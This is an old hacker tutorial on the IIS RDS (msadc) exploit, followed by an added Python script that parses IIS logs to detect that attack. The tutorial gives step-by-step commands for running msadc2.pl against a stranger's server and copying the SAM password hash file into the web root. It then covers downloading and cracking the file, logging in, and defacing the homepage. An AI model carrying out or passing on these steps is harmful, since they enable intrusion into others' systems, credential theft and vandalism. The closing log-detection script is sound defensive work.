Hacking IIS/PWS - the RDS Exploit
by r00tsec of Security Espionage Community
Modified July, IS oo
For Windoze9x/2k/nt users.

Note: This paper is based on the discoveries by RFP!

FIND A SERVER RUNNING IIS OR PWS:

To do that, do one of the following things:

a) Go to www.netcraft.com
b) Search for common IIS files via www.altavista.com, e.g.: link:/showcode.asp or url:/msadc/ or url:/iishelp

When you have found a server, type the following in your browser:

    www.server.com/index.ida
or
    www.server.com/.idq

and the server will more than gladly tell you (about 70% of the time) the default physical publication dir of the web service:

    c:\inetpub\wwwroot\  <- default dir

Now download msadc2.pl or msadc.pl from http://sec.subnet.dk in the Programs Section. Also download the ActivePerl interpreter for Windows NT or 9x from www.activestate.com and install it.

Now from command.com or cmd.exe run:

    perl -x c:\msadc2.pl -h www.server.com

It'll probably spit something like this out (if you are lucky):

    cmd /c

Then type the command you wish, e.g.:

    copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\temp.fil

In your browser type:

    www.server.com/temp.fil

Tada, you have now got your fingers on the NT hashed password file. To extract that file, type (at cmd/command):

    extract temp.fil whatever.file

Now run L0phtCrack from www.l0pht.com/l0phtcrack or similar to crack whatever.file.

When you've cracked whatever.file, edit lmhosts.sam (your own) with the following:

    www.server.com

Note: lmhosts.sam is located in \winnt\system32\drivers\etc on Windows NT and in \windows\config\ (if I recall?) on Windows 9x.

Now go to Start|Find|Computer and type: www.server.com. Click the icon and type in the user name and password you have gotten from your crack session with L0phtCrack... then access is probably granted.

TO HACK THA HOMEPAGE:

On www.server.com find the default homepage by typing www.server.com (in your browser) followed by one of the following: index.htm, index.html, index.asp, default.htm, default.html or default.asp and so on. Then run (from console):

    perl -x c:\msadc2.pl -h www.server.com
    cmd /c: echo This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4... > c:\inetpub\wwwroot\default.htm

(assuming default.htm is the main page for www.server.com). In your browser it will look like:

    This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4...

There are many other ways to hack www.server.com via the RDS exploit, but I'll leave those to your imagination.

- If you want to add something to this paper or know some kung fu style techniques using the RDS exploit, let me know -> r00tsec@hushmail.com or submit them in the Contact section at http://sec.subnet.dk

Call that a good day and stay put for more stunning papers! Let me know if it worked for you, or if you have any suggestions for other RDS script kiddie methods, or if the paper just sucks!
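Every step in this paper leaves a trace in the web server's own log: the /index.ida and /.idq path-disclosure probes, the requests to /msadc/ (where msadcs.dll lives), the showcode.asp and /iishelp sample-file searches. The following Python script is an added example, not part of the paper and not one of the tools it references; it parses IIS W3C extended log lines and flags the request paths the paper relies on, so an administrator can see whether a server has been probed or exploited this way. The log lines, the client addresses and the indicator labels are all constructed for the example; the real mitigation of the era was to remove the /msadc virtual directory and the .ida/.idq script mappings from the server entirely.

```python
import re
from collections import Counter

# Constructed sample of IIS W3C extended log lines (not taken from the paper).
# One normal visitor, one client walking through the paper's steps,
# and one client probing for the /iishelp sample tree.
SAMPLE_LOG = """#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2000-07-15 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-07-15 10:00:01 10.0.0.5 GET /index.htm - 200
2000-07-15 10:00:09 203.0.113.7 GET /index.ida - 200
2000-07-15 10:00:10 203.0.113.7 GET /.idq - 200
2000-07-15 10:00:15 203.0.113.7 GET /msadc/msadcs.dll - 200
2000-07-15 10:00:16 203.0.113.7 POST /msadc/msadcs.dll - 200
2000-07-15 10:00:20 203.0.113.7 GET /temp.fil - 200
2000-07-15 10:01:00 10.0.0.6 GET /products/default.asp id=3 200
2000-07-15 10:02:00 198.51.100.9 GET /iishelp/iis/misc/default.asp - 404
"""

# Request-path patterns taken from the paper's own reconnaissance and
# exploitation steps. The labels are constructed for this example.
INDICATORS = [
    (re.compile(r"^/msadc/", re.I), "rds_msadc"),
    (re.compile(r"\.id[aq]$", re.I), "path_disclosure_ida_idq"),
    (re.compile(r"/showcode\.asp$", re.I), "showcode_sample"),
    (re.compile(r"^/iishelp/", re.I), "iishelp_fingerprint"),
]


def parse_w3c(text):
    """Yield one dict per data row, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directive lines, or data before any #Fields header
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed row: skip it rather than misalign the columns
        yield dict(zip(fields, values))


def classify(row):
    """Return the indicator labels whose pattern matches the row's request path."""
    stem = row.get("cs-uri-stem", "")
    return [label for rx, label in INDICATORS if rx.search(stem)]


def find_rds_activity(text):
    """Scan W3C log text.

    Returns (hits, per_ip): hits is a list of (client ip, path, status, labels)
    for every flagged request, per_ip counts flagged requests per client so the
    client that walked through several steps stands out from a single probe.
    """
    hits = []
    per_ip = Counter()
    for row in parse_w3c(text):
        labels = classify(row)
        if labels:
            hits.append((row["c-ip"], row["cs-uri-stem"], row["sc-status"], labels))
            per_ip[row["c-ip"]] += 1
    return hits, per_ip


if __name__ == "__main__":
    hits, per_ip = find_rds_activity(SAMPLE_LOG)
    for ip, stem, status, labels in hits:
        print(f"{ip:15} {status} {stem:32} {','.join(labels)}")
    print("flagged requests per client:", per_ip.most_common())
```

A successful POST to /msadc/msadcs.dll with status 200 is the strongest single signal in the sample, since that is the request msadc2.pl sends; the .ida/.idq probes on their own only show reconnaissance. Point the script at a real log by replacing SAMPLE_LOG with the file contents; the #Fields header in the log decides the column layout, so it works across the field orders different IIS versions write.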